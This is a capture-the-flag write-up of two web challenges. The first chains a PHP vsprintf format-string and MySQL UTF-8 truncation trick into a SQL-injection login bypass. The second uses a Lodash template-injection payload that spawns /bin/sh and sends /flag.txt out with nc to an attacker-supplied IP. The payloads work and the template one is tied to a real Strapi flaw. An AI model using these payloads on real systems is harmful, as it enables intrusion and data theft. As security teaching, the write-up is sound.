Smooth Jazz
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Prerequisite knowledge
- Mysql engine truncates string from the beginning of an invalid UTF8-encoding character.
- Familiarity with the format parameter and the behavior of the vsprintf function in PHP.
vsprintf(string $format, mixed ...$values): string
- Format parameter:
%: starting symbol
1$: [argnums$] :match the first value from values that are passed in.
‘a: one option of the [flags] -> ‘(char): Replace blank with ‘a’ to pad the result string. For example, when [width] is set to 100 and the real length of the formatting string is only 5, the rest of the 95 characters would be padded with the letter ‘a’.
s: [specifier]: specify the data type for each data from inputted values.
is also a specifier, used for output real%
, which is a tricky one for smuggling a new token by combining it with the htmlspecialchars function.
- Format parameter:
Payload Example
1 | POST /username=admin%ff%251$c%23+%251$'>%25s&password=668 |
%ff: This truncates the string after “admin”. From the MySQL engine’s perspective, the input characters are interpreted as “admin”.
%251$c(after URL decoding becomes %1$c): This positional specifier manipulates the sprintf function to format the string as desired. In other words, it controls the real transfer stream and achieves our expectations by combining with the password value.
The reason we can’t use %c directly to format the password field is that string formatting typically proceeds in order. It maps each item of an input array to its respective position as defined by the specifiers. So we need to specify which data to render, avoiding the error.
PHP Fatal error: Uncaught ValueError: The arguments array must contain 2 items, 1 given in /var/www/html/index.php:3\nStack trace:\n#0 /var/www/html/index.php(3): vsprintf()
password=668: The SHA1 of 668 is 34cXXXXX. %34 represents a URL-encoded double-quote. Using vsprintf(“%1$c”, 34) generates a double-quote, exploiting SQL Injection to bypass password authentication.
%251$’>%25s (URL DECODING)-> %1$’>%s: the last step to do is get flag. Although we can not make the username totally match “admin”, we can inject a specifier as above to exfiltrate the second ‘FLAG’ formatting input.
To that end, there is a problem emerging. We can not pass two specifiers into the username field, since the previous vsprintf functions all only accept one input value. This means that directly passing two specifiers will cause an error in the PHP interpreter, as previously discussed. So the key point is to leverage
function to “create a specifier” for us. That is what this payload did.%1$’>%s –htmlspecialchars–> %1$’>%s
- The first specifier, %1$’&g, represents a floating-point number taken from position 1, using ‘&’ as the padding character.
- followed by the string “t;”
- The second specifier: %s: string taken from the 2nd position, that is where the FLAG is.
That is how we arrived there.
Strapi In
Strapi In is a really fun one! Since the challenge is derived from a 0-day vulnerability, I finished it myself 🤩 and successfully made a contribution to, a well-known payloads project! 🥳
Quick Write-up for STRAPI IN:
Step 1: Create a custom template with a reference ID of 1.
1 | {{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","nc **YOUR_IP YOUR_PORT** < /flag.txt"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}} |
Step 2: Visit the url:
for debug tips
mustache template with Lodash SSTI payloads
1 | {{= _.VERSION }}{{= _.templateSettings.evaluate }} |